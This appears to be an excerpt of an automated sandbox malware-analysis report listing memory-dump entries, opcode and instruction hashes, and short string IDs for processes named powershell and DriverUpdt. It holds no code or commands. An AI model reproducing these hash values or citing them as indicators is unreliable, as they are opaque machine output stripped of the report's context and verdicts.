                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>#I
                            • API String ID: 0-2340899229
                            • Opcode ID: e7ddf977e966041b6a467433a3cda1151263c9d8c9d66ad7519a1f54c2e410fe
                            • Instruction ID: da1521020855984667f9cb1daf2c9894b4c12a71e4343c3942b85399d8f17168
                            • Opcode Fuzzy Hash: e7ddf977e966041b6a467433a3cda1151263c9d8c9d66ad7519a1f54c2e410fe
                            • Instruction Fuzzy Hash: 9451D332A0DA4A4FE79AEB2C541167577E1FFA5260F5801BBD20EC72D3DF18E8058249
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>#I
                            • API String ID: 0-2340899229
                            • Opcode ID: 9d925bb9d67d1e69e3df169ff777b418f291891dc2c0aa46bec505e27b1b0d63
                            • Instruction ID: f02cd32eac3361619fc3a25a52dcf6e2d6e6e850901e92f66262d6ef5706cda5
                            • Opcode Fuzzy Hash: 9d925bb9d67d1e69e3df169ff777b418f291891dc2c0aa46bec505e27b1b0d63
                            • Instruction Fuzzy Hash: 71218F32D0EA8B4FE7AAEB2C545117466D1FF742A0F5901BBD21DC72E2DF18EC448649
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ffa088625b1d43d9bab202108a09fcb8e07054148ab9d7c1734f1bd983910a1c
                            • Instruction ID: 18f81c8fbbdf5c50e928662e272ac3d91e1d7c8c8be0de030beb6ea50cda6b73
                            • Opcode Fuzzy Hash: ffa088625b1d43d9bab202108a09fcb8e07054148ab9d7c1734f1bd983910a1c
                            • Instruction Fuzzy Hash: FE01D43190DA898FDB46EF2868196A8BFE0FF25340F4401EBD4888B0A2E7259944CB81
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a5a2cf6ab8ea6d3bab45f4fdc2bed4a56df9e5b23df791444c04f503d2f5191
                            • Instruction ID: 519f3687db648b76b856ae5cbe7d921de0f0c1c585903aeccb132e8f673d3fde
                            • Opcode Fuzzy Hash: 1a5a2cf6ab8ea6d3bab45f4fdc2bed4a56df9e5b23df791444c04f503d2f5191
                            • Instruction Fuzzy Hash: 3531073191CB888FDB19DB5CAC066A97BE0FB99711F00426FE049D3692CA75A855CBC2
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2591149897.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c62964d1fbe648a406213d5beb7a6e0d78886a7bb79ad98649893ce273719986
                            • Instruction ID: 5ac3c116901b78130578f238292eefe54d9531fad01a29c31895653af228d856
                            • Opcode Fuzzy Hash: c62964d1fbe648a406213d5beb7a6e0d78886a7bb79ad98649893ce273719986
                            • Instruction Fuzzy Hash: 8F41F47180DBC54FE7669B2898459623FF0FF53260F1505EFD089CB1A3E629A806CB92
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 98126a9d9838422376c874fd7716301160e537697cfcf81b16bc4a2083b3ae7b
                            • Instruction ID: 995747037ee485c6b3a2fd380e252d93129a0bcfc5341b9ea6f429e0300a92c5
                            • Opcode Fuzzy Hash: 98126a9d9838422376c874fd7716301160e537697cfcf81b16bc4a2083b3ae7b
                            • Instruction Fuzzy Hash: 3C21063090CB8C8FEB59DBAC984A7E97FE0EB96320F04416BD048C3192DB749446CB92
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                            • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8420699248bc57d67e197454f1966028d2ec4513137532cf268e95752a1a40b7
                            • Instruction ID: d12716fbd96981dca435260a40d5d99fcb0876254634c2c112dd5278a36ce8c9
                            • Opcode Fuzzy Hash: 8420699248bc57d67e197454f1966028d2ec4513137532cf268e95752a1a40b7
                            • Instruction Fuzzy Hash: 19F09A31A0D5458FDB54EB1CA4448B8B7E0FF15360F5900B7E159D71A3DB2AAC608764
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e1996b132e0f462bdfe1df46b46a43e80c0ef80fe2cd5e880efb2c4b77fe918
                            • Instruction ID: bea08552ecbdabe64bb7750a8a63a14747958bdd45605a57389dd10df55930a7
                            • Opcode Fuzzy Hash: 2e1996b132e0f462bdfe1df46b46a43e80c0ef80fe2cd5e880efb2c4b77fe918
                            • Instruction Fuzzy Hash: 7EE01A75918A4C8FCB49EF28D8599E97BA0FF69311B05029BE80DC7160EB719958CBC2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                            • API String ID: 0-962139525
                            • Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                            • Instruction ID: 7fd3566e5afb083c6e6401c0847751e720ad71e5f9896b647dd2248b4652e339
                            • Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                            • Instruction Fuzzy Hash: FD21D473A29525DAD242366CB8419DD7790EF543B978603F3E028CF193EE1CA48B8A95
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f6d3ebe5aafe33dbcb88ef10a58cc34cdcb20bee81395586457ccf029b89d6be
                            • Instruction ID: 3b412a804e4c07eb97908daf3062bd2d6cc837d34eeba538c1dde924525aafe1
                            • Opcode Fuzzy Hash: f6d3ebe5aafe33dbcb88ef10a58cc34cdcb20bee81395586457ccf029b89d6be
                            • Instruction Fuzzy Hash: 8C22B130A6DA595FE798FB2884997B976E2FF88754F800579E40EC32C3DF28AC418745
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93f0e2997c56e0301d12ef4900b193f81fe75b9b7a2cabc13a4f2474ba19131d
                            • Instruction ID: 592779e538a1f41370705213fa7413a9371c4134998d1f6a8d04fc6308e06926
                            • Opcode Fuzzy Hash: 93f0e2997c56e0301d12ef4900b193f81fe75b9b7a2cabc13a4f2474ba19131d
                            • Instruction Fuzzy Hash: 1E710922A1E6965EE352B37C64551FA2FA1EF86774F0842BBD4CCCE093DE0C58878365
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 096a0279456f85cf526d09df2e8247a42c102aeab69a5e8b5caaef80a3103d80
                            • Instruction ID: 8c30c5e89f9d39cbaf8522dd38e673b1fa8d4bc7cc8c0695463a73139e8260f5
                            • Opcode Fuzzy Hash: 096a0279456f85cf526d09df2e8247a42c102aeab69a5e8b5caaef80a3103d80
                            • Instruction Fuzzy Hash: 8651F020A5E6C55FD786EBB85864275BFE1EF87369F0801FAE089C71D3DE180806C356
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;O_$<O_^
                            • API String ID: 0-3431308889
                            • Opcode ID: baa5ab3dec3984ca56e0bfe911c1f960c214566be5a0914367f790b0c04aeb14
                            • Instruction ID: 3ce9c4ed5f51dc1d6fcba5258127e42062e0f59d15f8381b10bd8e42c10bd93d
                            • Opcode Fuzzy Hash: baa5ab3dec3984ca56e0bfe911c1f960c214566be5a0914367f790b0c04aeb14
                            • Instruction Fuzzy Hash: 45510532A9A1569FE340FB6CA4D11E93BB0FF80368F904176D44CCB393DE2C68458B94
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 39b862359a0fc3f474f6c43042a1140fa1ad6c64e4c54a0e2586535868cad3c4
                            • Instruction ID: c044383c1eac76f006684d93fcdc9b59905e3f09148ca34fbe0e6546266f735f
                            • Opcode Fuzzy Hash: 39b862359a0fc3f474f6c43042a1140fa1ad6c64e4c54a0e2586535868cad3c4
                            • Instruction Fuzzy Hash: 3151E532D1E5969EE741B77CA8611EA7BB0FF82365F0801B6D188DB1D3DE1C184A87A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 8278619ec01ffc9ee758f403e801557d99a4d449062f51fd95b85c85f7c91947
                            • Instruction ID: b851975c0400df489d7cd6d61e202ce4bb95346016145c079fc70b2caeedc2f5
                            • Opcode Fuzzy Hash: 8278619ec01ffc9ee758f403e801557d99a4d449062f51fd95b85c85f7c91947
                            • Instruction Fuzzy Hash: 8B51F732D1E5969ED741B77CA4511E93BB0FF82365F0802B7D188DB1D3DE1C184A87A8
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5268909075b9c850386cca8dd71e804ef8f7637574f228cea80c3c20639308bb
                            • Instruction ID: 5115a1f45e32d7f191d1b9ccdfd44def6f392aaebd1bedcf936342d9ba21472e
                            • Opcode Fuzzy Hash: 5268909075b9c850386cca8dd71e804ef8f7637574f228cea80c3c20639308bb
                            • Instruction Fuzzy Hash: 1231B032D1D98A8FE781EB68D8651ED7BB1FF86351F4405B6D009E72D3DE281C4A8750
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e50c13fd624a2532b9997a356b2546d93d05492ac3d9d6b680a85c503f9884dc
                            • Instruction ID: 04abbd87d11d32a690857259e8a3dd99e4296b63babcf22271d3967acbafffde
                            • Opcode Fuzzy Hash: e50c13fd624a2532b9997a356b2546d93d05492ac3d9d6b680a85c503f9884dc
                            • Instruction Fuzzy Hash: E051C636B1A52A9FD740FB6CA4516ED73A0FFD4365F40013AD508C72C3CF2C68458AA8
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce35542639bc4d8212d2199fd23fb07cd562979f28d56d71fc5e94e0651f60ac
                            • Instruction ID: a9025fb62be33843a53c7680186689b6c15489d2910126d6c85ed142d4f0824e
                            • Opcode Fuzzy Hash: ce35542639bc4d8212d2199fd23fb07cd562979f28d56d71fc5e94e0651f60ac
                            • Instruction Fuzzy Hash: E2410335B5992E9FDB44FB68D8916E977A1FFC4351F80053AD009D7282CE38A84ACB90
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c933ff0658774f2fceb2992ef1fbfc16ab3c2d8f39520785247184fffa51dc0e
                            • Instruction ID: 9f67053f120ce899112ec3ac39e076745ae4afea5d087f69fc68a29a32c39d04
                            • Opcode Fuzzy Hash: c933ff0658774f2fceb2992ef1fbfc16ab3c2d8f39520785247184fffa51dc0e
                            • Instruction Fuzzy Hash: F131D021B2D9491FE698EB6C946A379B6D2FBD8755F0405BEE00EC32D3DE289C428341
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction ID: ed1b7de362936619157a2f2bf3f75e65a3f39ee7ea80ebbf6f403d636cdd2533
                            • Opcode Fuzzy Hash: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction Fuzzy Hash: 78215121B2991A9FFB84B7BC545A3BDB2D2EF98751F10017AE40DD32C6EE2C6C414355
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53293b52b52a23dce6d44392a936546fe74a3fe5e888982f7b8a4b59f6a6551a
                            • Instruction ID: f94fc3a5aa57112953f1ce4d07929fc1213104cde811bebc113d793e13ef84f8
                            • Opcode Fuzzy Hash: 53293b52b52a23dce6d44392a936546fe74a3fe5e888982f7b8a4b59f6a6551a
                            • Instruction Fuzzy Hash: C4217C356DA5496FD780FF2880D66FA7FB1FB88214FD04668D90EC3397DE286A048B51
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 101efca0150798ede8f4b8e6c16a34858ce2a56c97e6e6b1b801b1da6871ee9b
                            • Instruction ID: 07f45a944b7ff5d405eadd153c6bf443762906a915a6e8dca36e47827aeba5c4
                            • Opcode Fuzzy Hash: 101efca0150798ede8f4b8e6c16a34858ce2a56c97e6e6b1b801b1da6871ee9b
                            • Instruction Fuzzy Hash: B301422090DAC10FF382B3B81C605797FE0DBD1391F0800ABD888C60D7DA189D4483A6
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 698d0d4433ba45e962f2f4a13b361b825ffb991575558d9c71b89744123c33e2
                            • Instruction ID: 3e56ea85ecd72b6b2c8db35d9270aa7b61562e02ad24b2df490a093f14b3b56a
                            • Opcode Fuzzy Hash: 698d0d4433ba45e962f2f4a13b361b825ffb991575558d9c71b89744123c33e2
                            • Instruction Fuzzy Hash: 9722A170A2DA599FE798FB2884597BA76D2FF88780F440579E40EC32C3DF28AC418745
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16d41d374eb465322fcfbe36862df545cc642fe61bf62512de34120ca94fff72
                            • Instruction ID: 6f96bd937e44d45d31d758439a5a85d73b028074360a54d6367eafd9b0bde0a2
                            • Opcode Fuzzy Hash: 16d41d374eb465322fcfbe36862df545cc642fe61bf62512de34120ca94fff72
                            • Instruction Fuzzy Hash: D4710922A1E6965EE352B37C64151FA2BA1EF86774F0842BBD4CCCF193DE0C58878365
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbfc253a7466121b855d989de58525cda1fecb370951b493c4ab9d97402c587a
                            • Instruction ID: 35064742a1ae3e7b659304a19886804fa802bf8a7866535a24e0e7f1606cd967
                            • Opcode Fuzzy Hash: cbfc253a7466121b855d989de58525cda1fecb370951b493c4ab9d97402c587a
                            • Instruction Fuzzy Hash: 5851F020A5E6C55FD786EBB858242B5BFE1EF87369F0801FAE089C71D3DE180806C356
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;O_$<O_^
                            • API String ID: 0-3431308889
                            • Opcode ID: fb41de854240ba38326c50718073c637f8350d1875667ea7371585b4a567cba5
                            • Instruction ID: b5e193a1116492f6e8597370e6372d659c30129c365dfcd31480d6c2bdfcf6c4
                            • Opcode Fuzzy Hash: fb41de854240ba38326c50718073c637f8350d1875667ea7371585b4a567cba5
                            • Instruction Fuzzy Hash: 4A51E336A5F61A9FD341FB6CE4A11EA3BB0FF843A5F544176D0488B383DE2C68468794
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: acff747772b12b820c96a93ff245ada22c71f29a0ecc3334cc146195d8347561
                            • Instruction ID: 686c9a055fd6a27a4fa09f4ef4e4ead42dd96f39d6d6da4f5954f799c4ccbad5
                            • Opcode Fuzzy Hash: acff747772b12b820c96a93ff245ada22c71f29a0ecc3334cc146195d8347561
                            • Instruction Fuzzy Hash: 3451D532D1E9969ED741B77CA8611EA7BB0FF86365F0801B6C188DB193DE1C184A87A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 3972620c7bedc3160be378d7fb758b9e39c4304dedeef95c0fe4f1f1aef22bb9
                            • Instruction ID: 9af1b66cfc84e5c1fff3276b350f6c8467df5c45fd10c6058c41297a48f0286c
                            • Opcode Fuzzy Hash: 3972620c7bedc3160be378d7fb758b9e39c4304dedeef95c0fe4f1f1aef22bb9
                            • Instruction Fuzzy Hash: 4D51F732D1E5969ED741B77CA8511E93BB0FF86365F0802B7C188DB1D3DE1C188A87A8
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10e85a45b2c5612ef24d4654ada8044f8388bcbc4c9d4decab5acdf261d70b22
                            • Instruction ID: 656b054e37822d12dc26f5d9a326f6a481d7883fef5d9fa2da9bee940f9aab1b
                            • Opcode Fuzzy Hash: 10e85a45b2c5612ef24d4654ada8044f8388bcbc4c9d4decab5acdf261d70b22
                            • Instruction Fuzzy Hash: 6731B032D1D98A8FD781EB68D8651ED7BB1FF8A351F4405B6C009E72D3DE281C4A8750
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b0fcd8a860fb721531f1d292c7bdeeaf1b4ce31c67495bbf7113969ec0bb765
                            • Instruction ID: fa1fb744f829c42d55b735834570bc38dc015202f4962bb28ace9aa440e389ef
                            • Opcode Fuzzy Hash: 1b0fcd8a860fb721531f1d292c7bdeeaf1b4ce31c67495bbf7113969ec0bb765
                            • Instruction Fuzzy Hash: D551C136B1A52A9FD740FB6CA4516ED73A0FFD4365F40013AD108CB283DF2D688587A8
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20f156148d3a0f4f8f9b220a381913cb6200e66028e267c435408a8a9a15a9b2
                            • Instruction ID: 081574550d0fcda3b2dbae6614300b5418b9074198cb1dea673df67318cbd32c
                            • Opcode Fuzzy Hash: 20f156148d3a0f4f8f9b220a381913cb6200e66028e267c435408a8a9a15a9b2
                            • Instruction Fuzzy Hash: 5441D235B1A92A9FDB44FB6CD8516ED77A1FFC8352F40053AD008D7282DE39A8468794
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93d0e1f81fbe8a7b943a574d79b9f03b8b8f058a3b1a177fb4e3b595c22ad074
                            • Instruction ID: b8b942f3afd854e2767b3325157e1d9c56d25268a9d599beeed6da97cd3041a2
                            • Opcode Fuzzy Hash: 93d0e1f81fbe8a7b943a574d79b9f03b8b8f058a3b1a177fb4e3b595c22ad074
                            • Instruction Fuzzy Hash: 2531D221B2D9491FE698EB6C946A379B6D2FBD8755F0405BEE00EC32D3DE289C418341
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction ID: ed1b7de362936619157a2f2bf3f75e65a3f39ee7ea80ebbf6f403d636cdd2533
                            • Opcode Fuzzy Hash: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction Fuzzy Hash: 78215121B2991A9FFB84B7BC545A3BDB2D2EF98751F10017AE40DD32C6EE2C6C414355
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b84d5aba3bcf5feded68bfd6f4767c8581b5105cf155a532b6d057b2f52631f
                            • Instruction ID: b9b1f0067f898ca26498f2f4c864ab6c5c957924663a4105b86523289c13f611
                            • Opcode Fuzzy Hash: 7b84d5aba3bcf5feded68bfd6f4767c8581b5105cf155a532b6d057b2f52631f
                            • Instruction Fuzzy Hash: 58216B7565B5095FD741EF58C0A16EE7FB1FB88281B804564D408C3387DE2C6A0187A0
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 693fa520d436c86070e05db085e3cdb6476747d5b6aecc97b9d49130a15510d4
                            • Instruction ID: 59dcb084a93769008a049b50f83bf3616fb06bf0eb187fc227ee8e758b39ac3e
                            • Opcode Fuzzy Hash: 693fa520d436c86070e05db085e3cdb6476747d5b6aecc97b9d49130a15510d4
                            • Instruction Fuzzy Hash: D401426090DAC10FF382B3B818605797FE0DBD5391F0800ABD888C70D7DA18AD4483A6
